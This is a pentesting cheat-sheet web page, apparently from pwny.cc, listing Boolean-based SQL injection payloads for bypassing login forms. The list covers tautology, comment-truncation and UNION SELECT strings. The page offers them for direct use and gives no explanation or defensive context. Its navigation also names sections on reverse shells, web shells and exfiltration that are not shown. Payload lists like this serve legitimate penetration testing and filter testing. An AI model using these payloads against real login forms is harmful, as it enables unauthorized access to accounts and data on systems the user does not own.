pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page

Was this helpful?

  1. WEB ATTACKS

SQL Injection (SQLi)

Boolean Injections

admin' --
admin' #
admin'/*
' or 1=1--
' or '1'='1 
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
 or -
 or  
 or &
 or ^
 or *
or true--
 or true--
' or true--
) or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
 or x=x
) or (x)=(x
)) or ((x))=((x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
 '|| '1'='1
'-'
' '
'&'
'^'
'*'
' || ''-'
' || '' '
' || ''&'
' || ''^'
' || ''*'
- 
&
^
*
 || -
 ||  
 || &
 || ^
 || *
|| true--
 || true--
' || true--
) || true--
') || true--
' || 'x'='x
') || ('x')=('x
')) || (('x'))=(('x
 || x=x
) || (x)=(x
)) || ((x))=((x
|| 1=1
|| 1=1--
|| 1=1#
|| 1=1/*
admin' --
admin' #
admin'/*
admin' || '1'='1
admin' || '1'='1'--
admin' || '1'='1'#
admin' || '1'='1'/*
admin'|| 1=1 || ''='
admin' || 1=1
admin' || 1=1--
admin' || 1=1#
admin' || 1=1/*
admin') || ('1'='1
admin') || ('1'='1'--
admin') || ('1'='1'#
admin') || ('1'='1'/*
admin') || '1'='1
admin') || '1'='1'--
admin') || '1'='1'#
admin') || '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin --
admin || 1=1
admin || 1=1--
admin || 1=1#
admin || 1=1/*
admin|| 1=1 || =
admin || 1=1
admin || 1=1--
admin || 1=1#
admin || 1=1/*
admin) || (1=1
admin) || (1=1--
admin) || (1=1#
admin) || (1=1/*
admin) || 1=1
admin) || 1=1--
admin) || 1=1#
admin) || 1=1/*
1234  AND 1=0 UNION ALL SELECT admin, 81dc9bdb52d04dc20036dbd8313ed055
admin #
admin/*
admin or 1=1
admin or 1=1--
admin or 1=1#
admin or 1=1/*
adminor 1=1 or =
admin or 1=1
admin or 1=1--
admin or 1=1#
admin or 1=1/*
admin) or (1=1
admin) or (1=1--
admin) or (1=1#
admin) or (1=1/*
admin) or 1=1
admin) or 1=1--
admin) or 1=1#
admin) or 1=1/*
'or(1)/*
or(1)/*
'or(1)--
PreviousServer Side Template Injection (SSTI)NextSQLMap

Last updated 1 year ago

Was this helpful?